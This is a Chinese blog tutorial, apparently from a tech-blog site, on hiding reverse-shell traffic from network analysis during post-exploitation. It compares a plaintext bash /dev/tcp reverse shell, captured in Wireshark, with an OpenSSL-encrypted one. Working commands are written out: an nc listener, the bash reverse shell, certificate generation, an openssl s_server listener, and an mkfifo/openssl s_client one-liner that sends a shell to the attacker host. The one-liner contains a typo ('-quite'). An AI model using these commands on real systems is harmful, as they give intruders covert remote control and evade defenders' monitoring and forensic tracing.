利用OpenSSL加密反弹shell流量

简介

在进行后渗透阶段的时候通常为了进一步横向操作往往需要反弹 shell,但是反弹 shell 方式都有一个缺点,流量是以明文方式进行传输的。进行流量分析的话就会很快被发现,如果对攻击流量进行溯源分析,检测带有攻击的特征,就可以复现攻击过程。

实验环境

kali:192.168.95.128

centos:192.168.95.147

Wireshark抓包

在kali上使用nc监听一个端口

nc -lvvp 4444

将centos的shell反弹过去

bash -i >& /dev/tcp/192.168.95.128/4444 0>&1

使用wireshark抓取流量包,反弹回来shell后执行一些命令

可以右键追踪tcp流查看到详细信息

使用wireshark抓包直接看到输入的命令和返回信息

OpenSSL反弹加密shell

OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。

在服务端使用openssl命令生成一个自签名证书

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

证书信息可以输入可以不输入

在服务端使用openssl命令监听一个端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

在客户端目标主机上使用命令执行反弹

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quite -connect 192.168.95.128:4444>/tmp/s;rm /tmp/s

使用wireshark抓取流量包,收到反弹回来的shell后执行一些命令

再查看wireshark抓取到的流量包,已经进行了加密

服务端和客户端在使用 TLSv1.2 协议进行加密通信。


结语

苦都吃了,如果还没长大,就吃亏了。

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值